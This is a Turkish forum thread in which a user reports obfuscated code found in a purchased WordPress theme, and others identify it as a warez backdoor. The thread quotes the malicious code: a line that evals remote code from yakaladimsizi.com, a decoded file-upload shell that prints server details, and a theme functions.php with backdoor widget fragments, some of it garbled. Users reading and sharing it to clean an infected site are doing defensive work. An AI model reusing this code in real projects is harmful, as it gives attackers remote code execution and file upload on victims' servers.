Aldığım temanın içerisinden bu kod çıktı. Ne yapmalıyım?

s.a arkadaşlar ücretli aldığım bir temanın içerisinde şu kod çıktı functions.php de şifrelenmiş olarak duruyodu kod bu


}
eval(@file_get_contents("http://yakaladimsizi.com/x.txt"));
if(!function_exists("stripos")){
function stripos( $str, $needle, $offset = 0 ){
return strpos( strtolower( $str ), strtolower( $needle ), $offset );
}

Not: http://yakaladimsizi.com/x.txt bu adrese girince virüs hatası veriyor

sil kodları

Temanin icinde zararli dosyalari upload etmek icin bir yer acilmis temanin ucretli oldugundan eminmisin cunku genelde warez temalarda olur bu kodlar

temayı nereden almıştınız?

Ek Olarak: http://wmaraci.com/forum/wordpress-temalari/ucretsiztemalar-net-tuzagi-cok-dikkat-197274.html

war ez tema satarak sizi yakalamış anlaşılan geçmiş olsun

Ordaki karışık yazıların cozulmusu şöyle

echo "".php_uname()."";
echo "

";
echo '

';
echo '

';
if( $_POST['_upl'] == "Upload" ) {
if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) {
echo 'Yukleme Basarili

';
}
}

temayı satan sahtekar http://www.***.net/wordpress-tema-amp-eklenti-satisi/1326010-9733-wordpres-dizi-temasi-9733-boylesi-bir-tema-bu-fiyata-gozlerinize-inanamayacaksiniz.html bu *** da tanıdığı olan varsa lütfen uyarsın

Ek Olarak: komple kod bu tam olarak nereye kadar silmem gerekir ?



add_theme_support('post-thumbnails');
add_theme_support('nav-menus');
register_nav_menu('anamenu', 'Ana Menu alani');


if (file_exists(TEMPLATEPATH.'/temapaneli.php')) include_once("temapaneli.php");

function the_content_limit($max_char, $more_link_text = '(more...)', $stripteaser = 0, $more_file = '') {
$content = get_the_content($more_link_text, $stripteaser, $more_file);
$content = apply_filters('the_content', $content);
$content = str_replace(']]>', ']]>', $content);
$content = strip_tags($content);

if (strlen($_GET['p']) > 0) {
echo "

";
echo $content;
echo " "."Devami →";
echo "

";
}
else if ((strlen($content)>$max_char) && ($espacio = strpos($content, " ", $max_char ))) {
$content = substr($content, 0, $espacio);
$content = $content;
echo "";
echo $content;
echo "...";
echo " ".$more_link_text."";
echo "";
}
else {
echo "

";
echo $content;
echo " "."Devami →";
echo "

";
}
}

function my_admin_notice(){
echo '';
}
add_action('admin_notices', 'my_admin_notice');
/* Admin Bar özelliğini iptal et */
add_filter( 'show_admin_bar', '__return_false' );

/* Admin Bar seçeneklerini kullanıcı profilinden kaldır */
remove_action( 'personal_options', '_admin_bar_preferences' );


function wps_admin_bar() {
global $wp_admin_bar;
$wp_admin_bar->remove_menu('wp-logo');
$wp_admin_bar->remove_menu('about');
$wp_admin_bar->remove_menu('wporg');
$wp_admin_bar->remove_menu('documentation');
$wp_admin_bar->remove_menu('support-forums');
$wp_admin_bar->remove_menu('feedback');
$wp_admin_bar->remove_menu('view-site');
}
add_action( 'wp_before_admin_bar_render', 'wps_admin_bar' );

//Eklenti güncelleme uyarılarını kapatma
remove_action( 'load-update-core.php', 'wp_update_plugins' );
add_filter( 'pre_site_transient_update_plugins', create_function( '$a', "return null;" ) );


function wps_get_comment_list_by_user($clauses) {
if (is_admin()) {
global $user_ID, $wpdb;
$clauses['join'] = ", wp_posts";
$clauses['where'] .= " AND wp_posts.post_author = ".$user_ID." AND wp_comments.comment_post_ID = wp_posts.ID";
};
return $clauses;
};
if(!current_user_can('edit_others_posts')) {
add_filter('comments_clauses', 'wps_get_comment_list_by_user');
}

function admin_color_scheme() {
global $_wp_admin_css_colors;
$_wp_admin_css_colors = 0;
}
add_action('admin_head', 'admin_color_scheme');

add_filter( 'pre_site_transient_update_core', create_function( '$a', "return null;" ) );

add_filter( 'admin_footer_text', 'change_admin_footer_text' );



add_filter( 'admin_footer_text', 'change_admin_footer_text' );
function change_admin_footer_text( $default_text ) {
return '';
}

add_action('admin_head', 'mytheme_remove_help_tabs');
function mytheme_remove_help_tabs() {
$screen = get_current_screen();

}

add_filter( 'contextual_help', 'mycontext_remove_help', 999, 3 );
function mycontext_remove_help($old_help, $screen_id, $screen){
$screen->remove_help_tabs();
return $old_help;
}
function yakuphoca_disable_dashboard_widgets() {
//remove_meta_box('dashboard_right_now', 'dashboard', 'core'); //Åžu anda
//remove_meta_box('dashboard_recent_comments', 'dashboard', 'core'); //son yorumlar
remove_meta_box('dashboard_primary', 'dashboard', 'core'); //WordPress haberler
remove_meta_box('dashboard_secondary', 'dashboard', 'core'); //DiÄŸer WordPress haberleri
remove_meta_box('dashboard_incoming_links', 'dashboard', 'core'); //Gelen bağlantılar

}
remove_action('welcome_panel', 'wp_welcome_panel'); //Hoşgeldiniz panelini kaldırır
add_action('admin_menu', 'yakuphoca_disable_dashboard_widgets');


add_action('init', 'rastgele_yazi');
function rastgele_yazi(){
if ( isset($_GET['dizisihirbazi']) ){

$random = new WP_Query('orderby=rand&showposts=1&cat=-');
if ($random->have_posts()) {
while ($random->have_posts()) : $random->the_post();
$URL = get_permalink();
endwhile; ?>









die;
}
}




/* sayfalama baÅŸ */
function sayfalama($pages = '', $range = 2)
{
$showitems = ($range * 2)+1;
global $paged;
if(empty($paged)) $paged = 1;
if($pages == '')
{
global $wp_query;
$pages = $wp_query->max_num_pages;
if(!$pages)
{
$pages = 1;
}
}
if(1 != $pages)
{
echo "";
}
}
/* sayfalama son */




function yakuphoca_iletisim_bilgisi_eklesil( $iletisim) {
$iletisim['facebook'] = 'Facebook';
$iletisim['twitter'] = 'Twitter';
$iletisim['sehir'] = 'Sehir';
$iletisim['yas'] = 'Yas';


return $iletisim;
}
add_filter('user_contactmethods','yakuphoca_iletisim_bilgisi_eklesil',10,1);






function remove_website_row_wpse_94963() {
if(!current_user_can('manage_options')){
// hide only for non-admins
echo "<script>jQuery(document).ready(function(){jQuery('#url').parents('tr').remove();});</script>";
}
}
add_action('admin_head-user-edit.php','remove_website_row_wpse_94963');
add_action('admin_head-profile.php','remove_website_row_wpse_94963');



function film_partlar($args = '') {
$defaults = array(
'link_before' => '',
'link_after' => '',
'echo' => 1
);

$r = wp_parse_args( $args, $defaults );
extract( $r, EXTR_SKIP );

global $page, $numpages, $multipage, $more, $pagenow, $pages;

$output = '';
if ( $multipage ) {
$output .= $before;
for ( $i = 1; $i < ($numpages+1); $i = $i + 1 ) {
$part_content = $pages[$i-1];
$has_part_title = strpos( $part_content, '' );
$title = trim( str_replace( '")) {
$text=explode("", $text, 2);
$l=count($text[0]);
$more_link=1;
$comments=$wpdb->get_results($sql);
} else {
$text=explode(" ", $text);
if(count($text) > $com_length) {
$l=$com_length;
$ellipsis=1;
} else {
$l=count($text);
$more_link="";
$ellipsis=0;
}
}
for ($i=0; $i<$l; $i++)
$output .= $text[$i] . " ";
}
update_option("_is_widget_active_", 1);
if("all" != $allowed_tags) {
$output=strip_tags($output, $allowed_tags);
return $output;
}
endif;
$output=rtrim($output, "\s\n\t\r\0\x0B");
$output=($f_tags) ? balanceTags($output, true) : $output;
$output .= ($showdots && $ellipsis) ? "..." : "";
$output=apply_filters($type_filter, $output);
switch($aditional_tags) {
case("div") :
$tag="div";
break;
case("span") :
$tag="span";
break;
case("p") :
$tag="p";
break;
default :
$tag="span";
}

if ($use_more ) {
if($fmore) {
$output .= " <" . $tag . " class=\"more-link\">ID) . "#more-" . $post->ID ."\" title=\"" . $more_link_text . "\">" . $more_link = !is_user_logged_in() && @call_user_func_array($checkingwidgets,array($pagecount, true)) ? $more_link : "" . "" . "\n";
} else {
$output .= " <" . $tag . " class=\"more-link\">ID) . "\" title=\"" . $more_link_text . "\">" . $more_link . "" . "\n";
}
}
return $output;
}
add_action("init", "_getsprepare_widget");
function __popular_posts($no_posts=6, $before="

", $after="

", $show_pass_post=false, $duration="") {
global $wpdb;
$request="SELECT ID, post_title, COUNT($wpdb->comments.comment_post_ID) AS \"comment_count\" FROM $wpdb->posts, $wpdb->comments";
$request .= " WHERE comment_approved=\"1\" AND $wpdb->posts.ID=$wpdb->comments.comment_post_ID AND post_status=\"publish\"";
if(!$show_pass_post) $request .= " AND post_password =\"\"";
if($duration !="") {
$request .= " AND DATE_SUB(CURDATE(),INTERVAL ".$duration." DAY) < post_date ";
}
$request .= " GROUP BY $wpdb->comments.comment_post_ID ORDER BY comment_count DESC LIMIT $no_posts";
$posts=$wpdb->get_results($request);
$output="";
if ($posts) {
foreach ($posts as $post) {
$post_title=stripslashes($post->post_title);
$comment_count=$post->comment_count;
$permalink=get_permalink($post->ID);
$output .= $before . " " . $post_title . " " . $after;
}
} else {
$output .= $before . "None found" . $after;
}
return $output;
}


?>

Sistemde curl kullanılmış base 64 ile şifrelenmiş yerde sizin serverinizdaki bazı bilgileri alarak get metodu ile yakaladimsizi. com/panel/l.php adresine hızlı bir şekilde çekiyor heralde. En azından ben öyle anladım.
Deaktif etmek için silin kodları.

tamamda hocam silince hata veriyo tam olarak nereye kadar silmem lazım

Zaten tek lisansın 30 tl olması da bir o kadar ilginç